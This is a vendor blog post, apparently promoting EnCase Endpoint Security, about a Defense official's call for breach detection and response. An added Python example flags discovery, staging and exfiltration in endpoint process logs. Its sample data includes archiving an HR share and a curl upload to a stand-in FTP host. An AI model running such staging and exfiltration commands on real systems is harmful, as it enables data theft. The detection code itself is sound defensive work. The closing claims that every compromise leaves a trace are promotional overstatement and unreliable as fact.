Office of the Secretary of Defense Calls for Emphasis on Detection and Response

Anthony Di Bello

This week, in response to the OPM breach, Chris Carpenter, Security Director at the Office of the Secretary of Defense, called for an emphasis on detection and response capabilities.

The reason, Carpenter noted, is that there is a clear window of opportunity within which to find attackers inside the network and cut off their access before they have a chance to exfiltrate data. This is borne out by breach disclosures: the vast majority report that the attackers had been inside for some time prior to the data exfiltration.

We can’t prevent all breaches. Now what?

Carpenter explained:

     When we start operating from an assumption that breaches cannot always be prevented, 
     we can put more emphasis on detection and response. This actually can save us time and 
     money. 

     When a system is breached it takes time for the attackers to identify or reach the 
     resources they are after on the network. During the time that it takes for them to learn the 
     network and find what they are after, detection would still protect valuable information. 

     Even after the attackers identify the information they must exfiltrate it. This is another 
     opportunity for detection. Early detection of compromise minimizes the amount of 
     information lost, cost of repair and reputational damage. With that type of benefit, 
     it should be easy to get the resources for detection systems, even in 
     budget-constrained environments. It's not, though.

The first thing organizations have to assume is that attackers may already be on their endpoints, undetected, looking for sensitive data to steal. If they are, they have already slipped past the existing security controls, which typically sit at the gateway or rely on signatures, and those controls offer little once the intruders are operating inside the network with compromised user accounts.
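The two windows Carpenter describes (the attacker learning the network, then staging and moving the data out) are exactly what an endpoint-side detection can watch for, because the tools used in each phase run as processes on the compromised host. The following is an added illustration, not code from the original post or from the EnCase product: it assumes a simple process-creation event schema (timestamp, host, user, image, command line), uses a constructed set of events rather than a real capture, and classifies each event into a phase with illustrative rules (a handful of discovery commands, archiver images, and transfer tools invoked with a URL). Tool names, regexes and the host/user values are all assumptions chosen for the example.

```python
"""Phase-based detection over endpoint process-creation telemetry.

Added example. It assumes an event schema of
{ts, host, user, image, cmdline} and uses constructed sample data.
The detection rules are illustrative and would need tuning in a real
environment (administrators also run `net view`)."""
from datetime import datetime
import re

# Constructed sample telemetry for one compromised workstation (ws-104)
# and one benign one (ws-221). Not a real capture.
EVENTS = [
    {"ts": "2015-06-10T09:02:11", "host": "ws-104", "user": "jdoe",
     "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"ts": "2015-06-10T09:05:40", "host": "ws-104", "user": "jdoe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c whoami /all"},
    {"ts": "2015-06-10T09:06:02", "host": "ws-104", "user": "jdoe",
     "image": "net.exe", "cmdline": "net view /domain"},
    {"ts": "2015-06-10T09:06:30", "host": "ws-104", "user": "jdoe",
     "image": "nltest.exe", "cmdline": "nltest /dclist:corp"},
    {"ts": "2015-06-11T14:20:00", "host": "ws-104", "user": "jdoe",
     "image": "rar.exe",
     "cmdline": r"rar.exe a -hp C:\Users\jdoe\AppData\Local\Temp\1.rar \\fs01\hr\personnel"},
    {"ts": "2015-06-11T14:31:15", "host": "ws-104", "user": "jdoe",
     "image": "curl.exe", "cmdline": "curl.exe -T 1.rar ftp://203.0.113.7/u/"},
    {"ts": "2015-06-10T10:00:00", "host": "ws-221", "user": "asmith",
     "image": "excel.exe", "cmdline": "excel.exe budget.xlsx"},
]

# Illustrative rules for the three phases. All of these are legitimate,
# signed tools run under a legitimate account, which is why perimeter and
# signature-based controls see nothing unusual here.
DISCOVERY_CMD = re.compile(
    r"\b(whoami|net\s+(view|group|user)|nltest|ipconfig|systeminfo)\b", re.I)
ARCHIVERS = {"rar.exe", "7z.exe", "winrar.exe", "makecab.exe"}
TRANSFER_TOOLS = {"curl.exe", "bitsadmin.exe", "certutil.exe", "ftp.exe"}
URL = re.compile(r"\b(https?|ftp)://", re.I)


def classify(event):
    """Return the attack phase an event belongs to, or None if benign.

    The transfer-tool check comes first so that an archive name in a
    curl command line is not mistaken for an archiver invocation."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    if image in TRANSFER_TOOLS and URL.search(cmd):
        return "exfiltration"
    if image in ARCHIVERS:
        return "staging"
    if DISCOVERY_CMD.search(cmd):
        return "discovery"
    return None


def analyze(events):
    """Group suspicious events per host, in time order.

    For each host that shows any phase, record the phases in the order
    they were first seen and the time of the first event of each phase.
    warning_seconds is the gap between the first discovery event and the
    first exfiltration event: the window in which detection would have
    cut the attacker off before data left the network."""
    report = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        phase = classify(ev)
        if phase is None:
            continue
        rec = report.setdefault(
            ev["host"], {"phases": [], "first_seen": {}, "users": set()})
        if phase not in rec["phases"]:
            rec["phases"].append(phase)
            rec["first_seen"][phase] = datetime.fromisoformat(ev["ts"])
        rec["users"].add(ev["user"])
    for rec in report.values():
        first = rec["first_seen"]
        if "discovery" in first and "exfiltration" in first:
            delta = first["exfiltration"] - first["discovery"]
            rec["warning_seconds"] = int(delta.total_seconds())
        else:
            rec["warning_seconds"] = None
    return report


if __name__ == "__main__":
    for host, rec in analyze(EVENTS).items():
        print(host, rec["phases"], "first alert at",
              rec["first_seen"][rec["phases"][0]].isoformat(),
              "warning window (s):", rec["warning_seconds"])
```

Run on the sample data, the first alert for ws-104 fires on the `whoami` at 09:05 on the first day, roughly 29 hours before the archive is pushed out by FTP on the second day; ws-221 never appears in the report. That gap is the window Carpenter is talking about, and every phase in it leaves a process-creation record on the endpoint whether or not the gateway noticed anything.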

But there’s hope

What Carpenter is calling for is detection and response, and that is what we do at the endpoint: what Gartner calls endpoint detection and response (EDR). Every action an attacker takes leaves a breadcrumb on the endpoint, on disk, in memory or in the registry, and there is no way to compromise a system without leaving such a trace. Those traces are what EnCase® Endpoint Security is built to see.

Comprehensive endpoint visibility is the only way to be sure you can root out an attacker, no matter how well they think they have hidden their tracks. EnCase Endpoint Security gives you the industry’s deepest and most complete endpoint visibility, even below the operating system level. I invite you to take a look and share your own ideas in the Comments section below.
